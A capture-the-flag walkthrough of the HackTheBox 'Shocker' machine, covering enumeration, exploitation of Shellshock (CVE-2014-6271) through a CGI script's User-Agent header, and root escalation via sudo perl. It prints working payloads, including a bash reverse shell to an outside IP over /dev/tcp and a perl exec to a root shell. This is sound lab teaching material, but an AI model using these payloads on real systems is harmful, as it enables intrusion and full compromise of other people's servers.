HackTheBox Shocker Walkthrough

Enjoy reading my HTB Shocker Writeup

Information Gathering

Let's begin with a basic nmap scan to gain information about the services running on HTB Shocker.

sudo nmap -p 1-5000 -sV -sC -v 10.10.10.56

This reveals two services:

The website contains some basic HTML code to display an image, nothing else.

Using gobuster we can search for hidden directories and files:

gobuster dir -u http://10.10.10.56 -w Lists/gobuster/directory.txt

This didn't return any directories, and gobuster had some trouble displaying custom status codes, so I switched to dirbuster. Dirbuster then revealed the /cgi-bin/ directory with response code 403. A 403 on the directory itself only means that listing it is forbidden; scripts inside it may still be executable, so the file names are worth brute-forcing.

Now that we know the directory exists, let's brute-force file names inside it. Since we cannot list it, we guess names with gobuster (or dirbuster) using a wordlist and a set of common extensions:

gobuster dir -u http://10.10.10.56/cgi-bin/ -x txt,sh,pl,tar.gz,bak -w /Lists/gobuster/directory.txt

Through that I found a file called user.sh that included the following content:

Content-Type: text/plain

Just an uptime test script

 18:51:55 up 53 min,  0 users,  load average: 1.16, 0.68, 0.35

ShellShock

Shellshock (CVE-2014-6271) is a vulnerability in Bash disclosed in September 2014. Bash imported function definitions from environment variables and, because of a parsing bug, also executed any commands appended after the function body. Any server that places attacker-controlled data into the environment of a Bash process is affected; the classic case is Apache running Bash CGI scripts, where every HTTP request header becomes an HTTP_* environment variable of the script.

As there is a Bash script in the CGI directory and the box is named Shocker, this host is a likely candidate for CVE-2014-6271.
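To make the mechanism concrete, here is an added example (not code from the original writeup) that probes the local bash with the standard CVE-2014-6271 environment-variable test and emulates what Apache's mod_cgi does with a request header. The stand-in user.sh and the marker strings are constructed for this demonstration; on a patched bash the header is treated as plain data and the injected command never runs.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup: how Shellshock works at the
# environment-variable level and how Apache's mod_cgi turns a request header
# into such a variable. The stand-in user.sh and the marker strings are
# constructed for this demonstration.

# Probe the local bash the same way CVE-2014-6271 is usually tested.
# Prints "vulnerable" if bash runs the command trailing a function definition
# imported from the environment, "patched" otherwise, "no-bash" if absent.
local_bash_check() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    # The value of x is a function body followed by an extra command. A
    # vulnerable bash executes that command while importing the environment,
    # before -c 'true' even runs.
    out=$(env x='() { :;}; echo SHOCKED' bash -c 'true' 2>/dev/null)
    case "$out" in
        *SHOCKED*) echo "vulnerable" ;;
        *)         echo "patched" ;;
    esac
}

# Write a constructed stand-in for /usr/lib/cgi-bin/user.sh to a temp file
# and print its path. It mirrors what the writeup's script returned.
make_user_sh() {
    f=$(mktemp)
    {
        echo '#!/bin/bash'
        echo 'echo "Content-Type: text/plain"'
        echo 'echo'
        echo 'echo "Just an uptime test script"'
        echo 'echo'
        echo 'uptime 2>/dev/null || echo "uptime not available"'
    } > "$f"
    echo "$f"
}

# Emulate mod_cgi: every request header becomes an HTTP_<NAME> environment
# variable of the script process. The User-Agent header therefore ends up in
# HTTP_USER_AGENT, and a vulnerable bash would execute the injected command
# before the first line of the script.
cgi_emulate() {
    script="$1"; user_agent="$2"
    HTTP_USER_AGENT="$user_agent" REQUEST_METHOD=GET bash "$script" 2>/dev/null
}

# Run the whole demonstration and summarise the outcome.
demo() {
    echo "local bash: $(local_bash_check)"
    script=$(make_user_sh)
    body=$(cgi_emulate "$script" '() { :;}; echo INJECTED')
    rm -f "$script"
    case "$body" in
        *INJECTED*) echo "CGI emulation: injected command executed" ;;
        *)          echo "CGI emulation: header treated as plain data" ;;
    esac
}

demo
```

Against a bash older than the September 2014 patches, cgi_emulate prints INJECTED before the Content-Type line, which is exactly the position the injected command occupies in a real CGI request: before the script has emitted any header, which is also why the later payloads start with an echo.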

nmap's scripting engine contains a script (http-shellshock.nse) which we are going to use for further investigation.

With nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56 we can let nmap check whether the target is vulnerable or not.

According to nmap it should be exploitable:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.

I configured Burp Suite as an upstream proxy for nmap to take a look at the exact request nmap makes and the response of the webserver.

nmap had placed the payload in the User-Agent, Cookie and Referer headers. As we only need one of them, I removed Cookie and Referer to keep the request a bit cleaner.

I then rewrote the payload to () { :;}; echo; ls, which resulted in a 200 but didn't output anything. The injected command runs while Bash is still importing the environment, before PATH is available, so a bare ls is not found.

Changing ls to /bin/ls then worked; use absolute paths for everything injected this way.

Using /bin/ls you are able to navigate through the filesystem. The script runs from /usr/lib/cgi-bin, so the relative path in the following payload resolves to /home/shelly/user.txt and reads the user flag:

User-Agent: () { :;}; echo; /bin/cat ../../../home/shelly/user.txt

Another way is to gain a foothold first with a reverse shell. Start a listener on your machine (e.g. nc -lvnp 4545), then send this payload:

User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.180/4545 0>&1


Privilege Escalation

After obtaining the reverse shell I checked if there are executables that we are allowed to execute as root without a password using: sudo -l.

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Since shelly may run /usr/bin/perl as root without a password, perl can be used to escalate our privileges (see GTFOBins): it simply execs a shell, which inherits root.

e.g. with: sudo perl -e 'exec "/bin/bash";'

Finally, in the root shell you can change into /root and read the system flag.


Tags:

HTB, HackTheBox, Shocker, Walkthrough